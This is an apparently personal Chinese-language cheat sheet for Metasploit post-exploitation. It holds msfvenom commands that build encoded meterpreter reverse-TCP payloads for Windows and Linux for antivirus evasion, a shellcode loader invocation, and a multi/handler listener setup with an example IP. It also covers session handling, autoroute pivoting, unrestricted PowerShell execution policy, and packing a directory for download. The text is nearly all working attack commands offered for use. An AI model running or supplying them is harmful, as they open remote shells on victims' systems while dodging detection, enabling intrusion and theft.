payload 生成 、 分离免杀
- 
    
生成shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=ip lport=port -ex86/shikata_ga_nai -i 5 -f raw > test.c - 
    
shellcode 加载器
https://github.com/clinicallyinane/shellcode_launcher/
shellcode_launcher.exe -i test.c - 
    
linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf 
meterpreter
- 
    
handle
use exploit/multi/handle set payload windows/meterpreter/reverse_tcp set lport 4444 set lhost 192.168.231.23 run - sessions 查看当前session
    
- background 切换sessions 至后台
 - sessions -i 1 将session 1 调至前台
 
 - run aotorouter -p  自动添加路由
    
- post/multi/manage/autoroute自动添加路由
 
 
powershell
- 
    
开执行权限
Set-ExecutionPolicy Unrestricted
 
linux
- 
    
遇到文件下载失败 试试先打包 再下
打包当前路径 tmp目录 tar -zcvf tmp.tar.gz ./tmp